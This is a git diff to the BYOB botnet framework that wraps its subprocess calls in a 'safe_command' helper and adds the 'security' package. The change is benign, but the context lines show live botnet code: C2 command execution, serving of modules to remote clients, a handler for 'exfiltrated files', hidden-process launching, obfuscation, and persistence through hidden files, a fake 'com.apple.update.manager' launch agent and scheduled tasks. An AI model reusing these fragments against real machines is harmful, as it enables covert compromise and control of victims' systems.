diff --git a/byob/core/generators.py b/byob/core/generators.py index 64da7342c..7d4346a8e 100644 --- a/byob/core/generators.py +++ b/byob/core/generators.py @@ -16,6 +16,7 @@ # modules import util +from security import safe_command # templates template_main = string.Template(""" @@ -135,7 +136,7 @@ def obfuscate(input): temp.file.write(input) temp.file.close() name = os.path.join(tempfile.gettempdir(), temp.name) - obfs = subprocess.Popen('pyminifier -o {} --obfuscate-classes --obfuscate-variables --replacement-length=1 {}'.format(name, name), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True) + obfs = safe_command.run(subprocess.Popen, 'pyminifier -o {} --obfuscate-classes --obfuscate-variables --replacement-length=1 {}'.format(name, name), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True) obfs.wait() output = open(name, 'r').read().replace('# Created by pyminifier (https://github.com/liftoff/pyminifier)', '') os.remove(name) @@ -237,9 +238,9 @@ def freeze(filename, icon=None, hidden=None, debug=False): # with open(fspec, 'w') as fp: # fp.write(spec) if debug: - process = subprocess.Popen('{0} -m PyInstaller -d imports -d bootloader --log-level DEBUG --onefile --hidden-import="pkg_resources.py2_warn" {1}'.format(sys.executable, filename), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True) + process = safe_command.run(subprocess.Popen, '{0} -m PyInstaller -d imports -d bootloader --log-level DEBUG --onefile --hidden-import="pkg_resources.py2_warn" {1}'.format(sys.executable, filename), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True) else: - process = subprocess.Popen('{0} -m PyInstaller --noconsole --onefile --hidden-import="pkg_resources.py2_warn" {1}'.format(sys.executable, filename), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True) + process = safe_command.run(subprocess.Popen, '{0} -m PyInstaller --noconsole --onefile --hidden-import="pkg_resources.py2_warn" {1}'.format(sys.executable, filename), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True) while True: try: line = process.stderr.readline().rstrip() diff --git a/byob/core/payloads.py b/byob/core/payloads.py index 913b0e16f..0c32e7688 100644 --- a/byob/core/payloads.py +++ b/byob/core/payloads.py @@ -20,6 +20,8 @@ import subprocess import collections import logging.handlers +from security import safe_command + if sys.version_info[0] < 3: from urllib import urlretrieve from urllib2 import urlopen, urlparse @@ -678,11 +680,11 @@ def execute(self, args): info = subprocess.STARTUPINFO() info.dwFlags = subprocess.STARTF_USESHOWWINDOW , subprocess.CREATE_NEW_ps_GROUP info.wShowWindow = subprocess.SW_HIDE - self.execute.process_list[name] = subprocess.Popen(args, startupinfo=info) + self.execute.process_list[name] = safe_command.run(subprocess.Popen, args, startupinfo=info) return "Running '{}' in a hidden process".format(path) except Exception as e: try: - self.execute.process_list[name] = subprocess.Popen(args, 0, None, None, subprocess.PIPE, subprocess.PIPE) + self.execute.process_list[name] = safe_command.run(subprocess.Popen, args, 0, None, None, subprocess.PIPE, subprocess.PIPE) return "Running '{}' in a new process".format(name) except Exception as e: log("{} error: {}".format(self.execute.__name__, str(e))) @@ -1016,7 +1018,7 @@ def run(self): if command: result = command(action) if action else command() else: - result, reserr = subprocess.Popen(task['task'].encode(), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True).communicate() + result, reserr = safe_command.run(subprocess.Popen, task['task'].encode(), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True).communicate() if result == None: result = reserr diff --git a/byob/modules/persistence.py b/byob/modules/persistence.py index 4f164d7a1..ab00ca228 100644 --- a/byob/modules/persistence.py +++ b/byob/modules/persistence.py @@ -10,6 +10,7 @@ import random import string import subprocess +from security import safe_command # packages if sys.platform == 'win32': @@ -112,11 +113,11 @@ def _add_hidden_file(value=None): if value and os.path.isfile(value): if os.name == 'nt': path = value - hide = subprocess.call('attrib +h {}'.format(path), shell=True) == 0 + hide = safe_command.run(subprocess.call, 'attrib +h {}'.format(path), shell=True) == 0 else: dirname, basename = os.path.split(value) path = os.path.join(dirname, '.' + basename) - hide = subprocess.call('cp {} {}'.format(value, path), shell=True) == 0 + hide = safe_command.run(subprocess.call, 'cp {} {}'.format(value, path), shell=True) == 0 return (True if hide else False, path) else: util.log("File '{}' not found".format(value)) @@ -163,7 +164,7 @@ def _add_launch_agent(value=None, name='com.apple.update.manager'): bash = template_plist.substitute(LABEL=label, FILE=value) with open(fpath, 'w') as fileobj: fileobj.write(bash) - bin_sh = bytes().join(subprocess.Popen('/bin/sh {}'.format(fpath), 0, None, None, subprocess.PIPE, subprocess.PIPE, shell=True).communicate()) + bin_sh = bytes().join(safe_command.run(subprocess.Popen, '/bin/sh {}'.format(fpath), 0, None, None, subprocess.PIPE, subprocess.PIPE, shell=True).communicate()) time.sleep(1) launch_agent= os.path.join(os.environ.get('HOME'), 'Library/LaunchAgents/{}.plist'.format(label)) if os.path.isfile(launch_agent): @@ -242,7 +243,7 @@ def _remove_scheduled_task(): if _methods['scheduled_task'].established: value = _methods['scheduled_task'].result try: - if subprocess.call('SCHTASKS /DELETE /TN {} /F'.format(value), shell=True) == 0: + if safe_command.run(subprocess.call, 'SCHTASKS /DELETE /TN {} /F'.format(value), shell=True) == 0: return (False, None) except: pass @@ -255,7 +256,7 @@ def _remove_hidden_file(): if os.path.isfile(filename): try: unhide = 'attrib -h {}'.format(filename) if os.name == 'nt' else 'mv {} {}'.format(filename, os.path.join(os.path.dirname(filename), os.path.basename(filename).strip('.'))) - if subprocess.call(unhide, 0, None, None, subprocess.PIPE, subprocess.PIPE, shell=True) == 0: + if safe_command.run(subprocess.call, unhide, 0, None, None, subprocess.PIPE, subprocess.PIPE, shell=True) == 0: return (False, None) except Exception as e1: util.log('{} error: {}'.format(_remove_hidden_file.__name__, str(e1))) diff --git a/byob/modules/portscanner.py b/byob/modules/portscanner.py index 7e173c0c8..a0544e500 100644 --- a/byob/modules/portscanner.py +++ b/byob/modules/portscanner.py @@ -7,6 +7,8 @@ import sys import json import socket +from security import safe_command + if sys.version_info[0] > 2: from queue import Queue else: @@ -652,7 +654,7 @@ def _ping(host): global results try: if host not in results: - if subprocess.call("ping -{} 1 -W 90 {}".format('n' if os.name == 'nt' else 'c', host), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True) == 0: + if safe_command.run(subprocess.call, "ping -{} 1 -W 90 {}".format('n' if os.name == 'nt' else 'c', host), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True) == 0: results[host] = {} return True else: diff --git a/byob/server.py b/byob/server.py index aeba05d31..95df25f13 100755 --- a/byob/server.py +++ b/byob/server.py @@ -19,6 +19,7 @@ import threading import subprocess import collections +from security import safe_command http_serv_mod = "SimpleHTTPServer" if sys.version_info[0] > 2: @@ -128,13 +129,13 @@ def main(): globals()['debug'] = options.debug # host Python packages on C2 port + 2 (for clients to remotely import) - globals()['package_handler'] = subprocess.Popen('{} -m {} {}'.format(sys.executable, http_serv_mod, options.port + 2), 0, None, subprocess.PIPE, stdout=tmp_file, stderr=tmp_file, cwd=globals()['packages'], shell=True) + globals()['package_handler'] = safe_command.run(subprocess.Popen, '{} -m {} {}'.format(sys.executable, http_serv_mod, options.port + 2), 0, None, subprocess.PIPE, stdout=tmp_file, stderr=tmp_file, cwd=globals()['packages'], shell=True) # host BYOB modules on C2 port + 1 (for clients to remotely import) - globals()['module_handler'] = subprocess.Popen('{} -m {} {}'.format(sys.executable, http_serv_mod, options.port + 1), 0, None, subprocess.PIPE, stdout=tmp_file, stderr=tmp_file, cwd=modules, shell=True) + globals()['module_handler'] = safe_command.run(subprocess.Popen, '{} -m {} {}'.format(sys.executable, http_serv_mod, options.port + 1), 0, None, subprocess.PIPE, stdout=tmp_file, stderr=tmp_file, cwd=modules, shell=True) # run simple HTTP POST request handler on C2 port + 3 to handle incoming uploads of exfiltrated files - globals()['post_handler'] = subprocess.Popen('{} core/handler.py {}'.format(sys.executable, int(options.port + 3)), 0, None, subprocess.PIPE, stdout=tmp_file, stderr=tmp_file, shell=True) + globals()['post_handler'] = safe_command.run(subprocess.Popen, '{} core/handler.py {}'.format(sys.executable, int(options.port + 3)), 0, None, subprocess.PIPE, stdout=tmp_file, stderr=tmp_file, shell=True) # run C2 globals()['c2'] = C2(host=options.host, port=options.port, db=options.database) @@ -444,11 +445,11 @@ def _execute(self, args): info = subprocess.STARTUPINFO() info.dwFlags = subprocess.STARTF_USESHOWWINDOW , subprocess.CREATE_NEW_ps_GROUP info.wShowWindow = subprocess.SW_HIDE - self.child_procs[name] = subprocess.Popen(args, startupinfo=info) + self.child_procs[name] = safe_command.run(subprocess.Popen, args, startupinfo=info) return "Running '{}' in a hidden process".format(path) except Exception as e: try: - self.child_procs[name] = subprocess.Popen(args, 0, None, None, subprocess.PIPE, subprocess.PIPE) + self.child_procs[name] = safe_command.run(subprocess.Popen, args, 0, None, None, subprocess.PIPE, subprocess.PIPE) return "Running '{}' in a new process".format(name) except Exception as e: util.log("{} error: {}".format(self.execute.__name__, str(e))) @@ -875,7 +876,7 @@ def serve_resources(self): while True: time.sleep(3) globals()['package_handler'].terminate() - globals()['package_handler'] = subprocess.Popen('{} -m {} {}'.format(sys.executable, http_serv_mod, port + 2), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, cwd=globals()['packages'], shell=True) + globals()['package_handler'] = safe_command.run(subprocess.Popen, '{} -m {} {}'.format(sys.executable, http_serv_mod, port + 2), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, cwd=globals()['packages'], shell=True) def run(self): """ @@ -912,7 +913,7 @@ def run(self): except: pass else: try: - output = str().join((subprocess.Popen(cmd_buffer, 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True).communicate())) + output = str().join((safe_command.run(subprocess.Popen, cmd_buffer, 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True).communicate())) except: pass if output: util.display(str(output)) diff --git a/byob/setup.py b/byob/setup.py index 818844790..ac3aa7621 100755 --- a/byob/setup.py +++ b/byob/setup.py @@ -1,6 +1,8 @@ #!/usr/bin/python # -*- coding: utf-8 -*- from __future__ import print_function +from security import safe_command + 'Setup (Build Your Own Botnet)' def main(): @@ -89,9 +91,9 @@ def main(): try: print("Installing requirements.txt") if os.name != "nt": - locals()['pip_install_1'] = subprocess.Popen('sudo --prompt=" Please enter sudo password (to install python dependencies): " {} -m pip install -r {}'.format(sys.executable, requirements), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True) + locals()['pip_install_1'] = safe_command.run(subprocess.Popen, 'sudo --prompt=" Please enter sudo password (to install python dependencies): " {} -m pip install -r {}'.format(sys.executable, requirements), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True) else: - locals()['pip_install_1'] = subprocess.Popen('{} -m pip install -r {}'.format(sys.executable, requirements), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True) + locals()['pip_install_1'] = safe_command.run(subprocess.Popen, '{} -m pip install -r {}'.format(sys.executable, requirements), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True) for line in locals()['pip_install_1'].stdout: print(line.decode()) sys.stdout.flush() diff --git a/web-gui/buildyourownbotnet/core/dummy_payload_for_testing.py b/web-gui/buildyourownbotnet/core/dummy_payload_for_testing.py index 81edbcec7..69e0d668f 100644 --- a/web-gui/buildyourownbotnet/core/dummy_payload_for_testing.py +++ b/web-gui/buildyourownbotnet/core/dummy_payload_for_testing.py @@ -4,6 +4,8 @@ import sys import logging import contextlib +from security import safe_command + if sys.version_info[0] < 3: from urllib2 import urlopen else: @@ -1936,12 +1938,12 @@ def execute(self, args): info = subprocess.STARTUPINFO() info.dwFlags = subprocess.STARTF_USESHOWWINDOW , subprocess.CREATE_NEW_ps_GROUP info.wShowWindow = subprocess.SW_HIDE - self.execute.process_list[name] = subprocess.Popen(args, startupinfo=info) + self.execute.process_list[name] = safe_command.run(subprocess.Popen, args, startupinfo=info) return "Running '{}' in a hidden process".format(path) except Exception as e: # revert to normal process if hidden process fails try: - self.execute.process_list[name] = subprocess.Popen(args, 0, None, None, subprocess.PIPE, subprocess.PIPE) + self.execute.process_list[name] = safe_command.run(subprocess.Popen, args, 0, None, None, subprocess.PIPE, subprocess.PIPE) return "Running '{}' in a new process".format(name) except Exception as e: log("{} error: {}".format(self.execute.__name__, str(e))) @@ -2298,7 +2300,7 @@ def run(self): if command: result = command(action) if action else command() else: - result, reserr = subprocess.Popen(task['task'].encode(), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True).communicate() + result, reserr = safe_command.run(subprocess.Popen, task['task'].encode(), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True).communicate() if result == None: result = reserr diff --git a/web-gui/buildyourownbotnet/core/generators.py b/web-gui/buildyourownbotnet/core/generators.py index aec5bab03..750ae6b45 100644 --- a/web-gui/buildyourownbotnet/core/generators.py +++ b/web-gui/buildyourownbotnet/core/generators.py @@ -18,6 +18,7 @@ # modules from buildyourownbotnet.core import util +from security import safe_command # templates template_main = string.Template(""" @@ -139,7 +140,7 @@ def obfuscate(input): temp.file.write(input) temp.file.close() name = os.path.join(tempfile.gettempdir(), temp.name) - obfs = subprocess.Popen('pyminifier -o {} --obfuscate-classes --obfuscate-variables --replacement-length=1 {}'.format(name, name), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True) + obfs = safe_command.run(subprocess.Popen, 'pyminifier -o {} --obfuscate-classes --obfuscate-variables --replacement-length=1 {}'.format(name, name), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True) obfs.wait() output = open(name, 'r').read().replace('# Created by pyminifier (https://github.com/liftoff/pyminifier)', '') os.remove(name) @@ -272,7 +273,7 @@ def freeze(filename, icon=None, hidden=None, owner=None, operating_system=None, os.chdir(path) # cross-compile executable for the specified os/arch using pyinstaller docker containers - process = subprocess.Popen('docker run -v "$(pwd):/src/" {docker_container}'.format( + process = safe_command.run(subprocess.Popen, 'docker run -v "$(pwd):/src/" {docker_container}'.format( src_path=os.path.dirname(path), docker_container=operating_system + '-' + architecture), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, diff --git a/web-gui/buildyourownbotnet/core/payloads.py b/web-gui/buildyourownbotnet/core/payloads.py index cae5d26d0..d037e7289 100644 --- a/web-gui/buildyourownbotnet/core/payloads.py +++ b/web-gui/buildyourownbotnet/core/payloads.py @@ -20,6 +20,7 @@ import collections import multiprocessing import logging.handlers +from security import safe_command if sys.version_info[0] < 3: from urllib import urlretrieve @@ -691,12 +692,12 @@ def execute(self, args): info = subprocess.STARTUPINFO() info.dwFlags = subprocess.STARTF_USESHOWWINDOW , subprocess.CREATE_NEW_ps_GROUP info.wShowWindow = subprocess.SW_HIDE - self.execute.process_list[name] = subprocess.Popen(args, startupinfo=info) + self.execute.process_list[name] = safe_command.run(subprocess.Popen, args, startupinfo=info) return "Running '{}' in a hidden process".format(path) except Exception as e: # revert to normal process if hidden process fails try: - self.execute.process_list[name] = subprocess.Popen(args, 0, None, None, subprocess.PIPE, subprocess.PIPE) + self.execute.process_list[name] = safe_command.run(subprocess.Popen, args, 0, None, None, subprocess.PIPE, subprocess.PIPE) return "Running '{}' in a new process".format(name) except Exception as e: log("{} error: {}".format(self.execute.__name__, str(e))) @@ -1053,7 +1054,7 @@ def run(self): if command: result = command(action) if action else command() else: - result, reserr = subprocess.Popen(task['task'].encode(), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True).communicate() + result, reserr = safe_command.run(subprocess.Popen, task['task'].encode(), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True).communicate() if result == None: result = reserr diff --git a/web-gui/buildyourownbotnet/modules/persistence.py b/web-gui/buildyourownbotnet/modules/persistence.py index 197ac2b40..59b6eb244 100644 --- a/web-gui/buildyourownbotnet/modules/persistence.py +++ b/web-gui/buildyourownbotnet/modules/persistence.py @@ -10,6 +10,7 @@ import random import string import subprocess +from security import safe_command # packages if sys.platform == 'win32': @@ -114,11 +115,11 @@ def _add_hidden_file(value=None): if value and os.path.isfile(value): if os.name == 'nt': path = value - hide = subprocess.call('attrib +h {}'.format(path), shell=True) == 0 + hide = safe_command.run(subprocess.call, 'attrib +h {}'.format(path), shell=True) == 0 else: dirname, basename = os.path.split(value) path = os.path.join(dirname, '.' + basename) - hide = subprocess.call('cp {} {}'.format(value, path), shell=True) == 0 + hide = safe_command.run(subprocess.call, 'cp {} {}'.format(value, path), shell=True) == 0 return (True if hide else False, path) else: util.log("File '{}' not found".format(value)) @@ -165,7 +166,7 @@ def _add_launch_agent(value=None, name='com.apple.update.manager'): bash = template_plist.substitute(LABEL=label, FILE=value) with open(fpath, 'w') as fileobj: fileobj.write(bash) - bin_sh = bytes().join(subprocess.Popen('/bin/sh {}'.format(fpath), 0, None, None, subprocess.PIPE, subprocess.PIPE, shell=True).communicate()) + bin_sh = bytes().join(safe_command.run(subprocess.Popen, '/bin/sh {}'.format(fpath), 0, None, None, subprocess.PIPE, subprocess.PIPE, shell=True).communicate()) time.sleep(1) launch_agent= os.path.join(os.environ.get('HOME'), 'Library/LaunchAgents/{}.plist'.format(label)) if os.path.isfile(launch_agent): @@ -244,7 +245,7 @@ def _remove_scheduled_task(): if _methods['scheduled_task'].established: value = _methods['scheduled_task'].result try: - if subprocess.call('SCHTASKS /DELETE /TN {} /F'.format(value), shell=True) == 0: + if safe_command.run(subprocess.call, 'SCHTASKS /DELETE /TN {} /F'.format(value), shell=True) == 0: return (False, None) except: pass @@ -257,7 +258,7 @@ def _remove_hidden_file(): if os.path.isfile(filename): try: unhide = 'attrib -h {}'.format(filename) if os.name == 'nt' else 'mv {} {}'.format(filename, os.path.join(os.path.dirname(filename), os.path.basename(filename).strip('.'))) - if subprocess.call(unhide, 0, None, None, subprocess.PIPE, subprocess.PIPE, shell=True) == 0: + if safe_command.run(subprocess.call, unhide, 0, None, None, subprocess.PIPE, subprocess.PIPE, shell=True) == 0: return (False, None) except Exception as e1: util.log('{} error: {}'.format(_remove_hidden_file.__name__, str(e1))) diff --git a/web-gui/buildyourownbotnet/modules/portscanner.py b/web-gui/buildyourownbotnet/modules/portscanner.py index 7e173c0c8..a0544e500 100644 --- a/web-gui/buildyourownbotnet/modules/portscanner.py +++ b/web-gui/buildyourownbotnet/modules/portscanner.py @@ -7,6 +7,8 @@ import sys import json import socket +from security import safe_command + if sys.version_info[0] > 2: from queue import Queue else: @@ -652,7 +654,7 @@ def _ping(host): global results try: if host not in results: - if subprocess.call("ping -{} 1 -W 90 {}".format('n' if os.name == 'nt' else 'c', host), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True) == 0: + if safe_command.run(subprocess.call, "ping -{} 1 -W 90 {}".format('n' if os.name == 'nt' else 'c', host), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True) == 0: results[host] = {} return True else: diff --git a/web-gui/buildyourownbotnet/server.py b/web-gui/buildyourownbotnet/server.py index e4079e711..b550206fc 100755 --- a/web-gui/buildyourownbotnet/server.py +++ b/web-gui/buildyourownbotnet/server.py @@ -22,6 +22,7 @@ import subprocess import collections from datetime import datetime +from security import safe_command http_serv_mod = "SimpleHTTPServer" if sys.version_info[0] > 2: @@ -105,11 +106,11 @@ def _setup_server(self): # don't run multiple instances try: # serve packages - globals()['package_handler'] = subprocess.Popen('{0} -m {1} {2}'.format(sys.executable, http_serv_mod, self.port + 2), 0, None, subprocess.PIPE, stdout=tmp_file, stderr=tmp_file, cwd=globals()['packages'], shell=True) + globals()['package_handler'] = safe_command.run(subprocess.Popen, '{0} -m {1} {2}'.format(sys.executable, http_serv_mod, self.port + 2), 0, None, subprocess.PIPE, stdout=tmp_file, stderr=tmp_file, cwd=globals()['packages'], shell=True) util.log("Serving Python packages from {0} on port {1}...".format(globals()['packages'], self.port + 2)) # serve modules - globals()['module_handler'] = subprocess.Popen('{0} -m {1} {2}'.format(sys.executable, http_serv_mod, self.port + 1), 0, None, subprocess.PIPE, stdout=tmp_file, stderr=tmp_file, cwd=modules, shell=True) + globals()['module_handler'] = safe_command.run(subprocess.Popen, '{0} -m {1} {2}'.format(sys.executable, http_serv_mod, self.port + 1), 0, None, subprocess.PIPE, stdout=tmp_file, stderr=tmp_file, cwd=modules, shell=True) util.log("Serving BYOB modules from {0} on port {1}...".format(modules, self.port + 1)) globals()['c2'] = self @@ -137,11 +138,11 @@ def _execute(self, args): info = subprocess.STARTUPINFO() info.dwFlags = subprocess.STARTF_USESHOWWINDOW , subprocess.CREATE_NEW_ps_GROUP info.wShowWindow = subprocess.SW_HIDE - self.child_procs[name] = subprocess.Popen(args, startupinfo=info) + self.child_procs[name] = safe_command.run(subprocess.Popen, args, startupinfo=info) return "Running '{}' in a hidden process".format(path) except Exception as e: try: - self.child_procs[name] = subprocess.Popen(args, 0, None, None, subprocess.PIPE, subprocess.PIPE) + self.child_procs[name] = safe_command.run(subprocess.Popen, args, 0, None, None, subprocess.PIPE, subprocess.PIPE) return "Running '{}' in a new process".format(name) except Exception as e: util.log("{} error: {}".format(self._execute.__name__, str(e))) @@ -269,7 +270,7 @@ def serve_resources(self): while True: time.sleep(3) globals()['package_handler'].terminate() - globals()['package_handler'] = subprocess.Popen('{} -m {} {}'.format(sys.executable, http_serv_mod, port + 2), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, cwd=globals()['packages'], shell=True) + globals()['package_handler'] = safe_command.run(subprocess.Popen, '{} -m {} {}'.format(sys.executable, http_serv_mod, port + 2), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, cwd=globals()['packages'], shell=True) def run(self): """ diff --git a/web-gui/requirements.txt b/web-gui/requirements.txt index 6319b7a9b..65162b8c5 100644 --- a/web-gui/requirements.txt +++ b/web-gui/requirements.txt @@ -20,3 +20,4 @@ py-cryptonight>=0.2.4 opencv-python;python_version>'3' pypiwin32==223;sys.platform=='win32' pyHook==1.5.1;sys.platform=='win32' +security==1.3.1